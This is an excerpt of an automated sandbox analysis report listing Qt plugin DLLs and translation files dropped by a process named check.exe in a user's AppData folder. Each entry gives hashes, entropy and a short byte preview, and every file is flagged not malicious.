                                                                                                                                                                                                            MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                            SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                            SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                            SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39408
                                                                                                                                                                                                            Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                            MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                            SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                            SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                            SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45040
                                                                                                                                                                                                            Entropy (8bit):6.016125225197622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                            MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                            SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                            SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                            SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38384
                                                                                                                                                                                                            Entropy (8bit):5.957072398645384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                            MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                            SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                            SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                            SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):421360
                                                                                                                                                                                                            Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                            MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                            SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                            SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                            SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32240
                                                                                                                                                                                                            Entropy (8bit):5.978149408776758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                            MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                            SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                            SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                            SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):5.865766652452823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                            MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                            SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                            SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                            SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390128
                                                                                                                                                                                                            Entropy (8bit):5.724665470266677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                            MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                            SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                            SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                            SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30192
                                                                                                                                                                                                            Entropy (8bit):5.938644231596902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                            MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                            SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                            SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                            SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510448
                                                                                                                                                                                                            Entropy (8bit):6.605517748735854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                            MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                            SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                            SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                            SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):844784
                                                                                                                                                                                                            Entropy (8bit):6.625808732261156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                            MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                            SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                            SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                            SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):754672
                                                                                                                                                                                                            Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                            MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                            SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                            SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                            SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):482288
                                                                                                                                                                                                            Entropy (8bit):6.152380961313931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                            MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                            SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                            SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                            SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1477104
                                                                                                                                                                                                            Entropy (8bit):6.575113537540671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                            MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                            SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                            SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                            SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68592
                                                                                                                                                                                                            Entropy (8bit):6.125954940500008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                            MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                            SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                            SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                            SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144368
                                                                                                                                                                                                            Entropy (8bit):6.294675868932723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                            MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                            SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                            SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                            SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):130
                                                                                                                                                                                                            Entropy (8bit):4.024232093209084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                            MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                            SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                            SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                            SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                            MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                            SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                            SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                            SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
